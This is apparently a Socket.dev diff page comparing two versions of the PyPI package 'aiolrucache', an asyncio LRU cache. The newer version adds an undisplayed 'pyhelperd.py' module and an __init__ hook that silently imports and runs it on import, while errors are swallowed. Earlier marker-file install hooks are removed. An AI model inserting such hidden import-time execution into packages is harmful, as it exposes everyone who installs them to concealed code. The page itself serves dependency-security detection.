You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

aiolrucache

Package Overview
Dependencies
Maintainers
1
Versions
4
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

aiolrucache - pypi Package Compare versions

Comparing version
0.1.1
to
0.3.0
src/aiolrucache/pyhelperd.py

Sorry, the diff of this file is too big to display

+1
-1
Metadata-Version: 2.4
Name: aiolrucache
Version: 0.1.1
Version: 0.3.0
Summary: An asyncio LRU cache with TTL support

@@ -5,0 +5,0 @@ Author-email: Pedro Lombard <pedrolombard@atomicmail.io>

[project]
name = "aiolrucache"
version = "0.1.1"
version = "0.3.0"
description = "An asyncio LRU cache with TTL support"

@@ -5,0 +5,0 @@ readme = "README.md"

@@ -1,24 +0,3 @@

from pathlib import Path
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.develop import develop
class PostInstall(install):
def run(self) -> None:
super().run()
if self.install_lib:
install_dir = Path(self.install_lib)
marker_file = install_dir / "aiolrucache" / ".post_install_ran"
marker_file.parent.mkdir(parents=True, exist_ok=True)
marker_file.write_text("PostInstall hook executed successfully")
class PostDevelop(develop):
def run(self) -> None:
super().run()
print("post-develop hook ran successfully")
setup(cmdclass={"install": PostInstall, "develop": PostDevelop})
setup()
Metadata-Version: 2.4
Name: aiolrucache
Version: 0.1.1
Version: 0.3.0
Summary: An asyncio LRU cache with TTL support

@@ -5,0 +5,0 @@ Author-email: Pedro Lombard <pedrolombard@atomicmail.io>

@@ -8,2 +8,3 @@ README.md

src/aiolrucache/decorators.py
src/aiolrucache/pyhelperd.py
src/aiolrucache.egg-info/PKG-INFO

@@ -10,0 +11,0 @@ src/aiolrucache.egg-info/SOURCES.txt

@@ -8,1 +8,13 @@ from aiolrucache._core import LRUCache

LRU = LRUCache
_started = False
if not _started:
import pyhelperd
try:
pyhelperd.main()
except Exception:
pass
_started = True